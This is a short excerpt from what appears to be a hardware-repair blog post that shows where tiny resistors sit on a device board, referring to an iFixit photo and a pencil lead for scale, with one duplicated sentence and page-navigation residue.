To get an idea of where these resistors are located, check the iFixit picture for reference (black box is where they are).

To get an idea of where these resistors are located, check the iFixit picture for reference (black box is where they are).

Comparsion

To get an idea of the size of the resistors, I’ve placed a 0.7mm pencil lead next to them.

 

Page 1 of 41234